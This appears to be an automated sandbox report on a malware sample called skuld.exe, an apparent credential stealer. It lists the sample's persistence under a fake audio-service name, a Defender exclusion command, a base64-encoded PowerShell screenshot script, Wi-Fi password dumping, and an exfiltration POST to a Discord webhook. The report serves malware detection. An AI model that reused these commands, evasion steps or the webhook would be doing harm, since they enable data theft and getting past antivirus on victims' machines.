A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\skuld.exe, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service
                        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Dynamic CSharp Compile Artefact
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5196, TargetFilename: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe, ProcessId: 3724, ProcessName: powershell.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Dot net compiler compiles file from suspicious location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Capture Wi-Fi password
                        Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\Desktop\skuld.exe", ParentImage: C:\Users\user\Desktop\skuld.exe, ParentProcessId: 7148, ParentProcessName: skuld.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5464, ProcessName: netsh.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: skuld.exeVirustotal: Detection: 24%Perma Link
                        Joe Sandbox ML detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: skuld.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: \de.pdb- source: powershell.exe, 0000000D.00000002.1750605132.000001CAF7485000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdb source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdbhPtC source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: api.gofile.io
                        Source: global trafficDNS traffic detected: DNS query: discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1Host: discord.comUser-Agent: Go-http-client/1.1Content-Length: 702Content-Type: multipart/form-data; boundary=588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Wed, 12 Mar 2025 09:40:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"X-Robots-Tag: noindex, nofollow
                        Source: powershell.exe, 0000000F.00000002.1766382072.000002704FF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: http://ip-api.com/json
                        Source: powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngP
                        Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
